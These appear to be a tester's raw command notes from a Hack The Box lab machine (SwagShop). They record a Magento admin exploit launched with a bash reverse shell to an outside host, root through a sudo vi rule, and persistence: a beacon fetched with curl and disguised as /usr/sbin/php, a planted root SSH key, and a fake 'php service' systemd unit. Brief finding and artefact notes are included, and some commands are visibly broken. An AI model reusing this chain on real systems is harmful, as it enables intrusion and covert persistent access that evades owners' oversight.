### setup

sudo apt install -y \
	nmap curl python3-venv make zip unzip \
	mtr

sudo openvpn --config htb.ovpn
2025-04-05T08:04:58-04:00

### T1 10.129.232.93

ping -c 1 10.129.232.93

python3 -m venv venv
source venv/bin/activate
python3 -m pip install mechanize
python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'"
2025-04-05T08:05:44-04:00


which curl
/usr/bin/curl

uname -a
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
uid=0(root) gid=0(root) groups=0(root)
# finding: vi can spawn a shell, so this NOPASSWD rule is effectively unrestricted root for www-data; the path glob does not limit it.
# host-side fix: drop the rule, or allow sudoedit on named files only.

mkdir -f /tmp/.X1-lock/
curl -L -O g

 10.10.14.4

generate beacon  --http http://10.10.14.4:4444 --seconds 20 --os linux
http --lport 4444

curl -s -L http://10.10.14.4:8080/php -o /usr/sbin/php
chmod +x /tmp/.php
/tmp/.php
2025-04-05T08:25:45-04:00

 66root_rsa.pub
 67ssh-rsa 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
 68
 69
mkdir /root/.ssh/
upload /home/user/swag/2025-04-05/root_rsa.pub /root/.ssh/authorized_keys
chmod /root/.ssh/authorized_keys 0400

cat /etc/ssh/sshd_config
#PermitRootLogin prohibit-password

ssh -vvv root@10.129.232.93 -T /bin/bash
2025-04-05T08:44:17-04:00

mv /tmp/.php /usr/sbin/php

php service

[Unit]
Description=php service
After=network.target
Type=simple
Restart=always
RestartSec=1
ExecStart=/usr/sbin/php

[Install]
WantedBy=multi-user.target

upload -o /home/user/swag/2025-04-05/out/php.service /lib/systemd/system/php.service
execute systemctl daemon-reload
execute systemctl enable php.service
execute systemctl start php.service

good service

# host artefacts from this session: /usr/sbin/php and /lib/systemd/system/php.service (uploaded, so they should not be owned by any package; dpkg -S on either path would report no match), plus the key written to /root/.ssh/authorized_keys.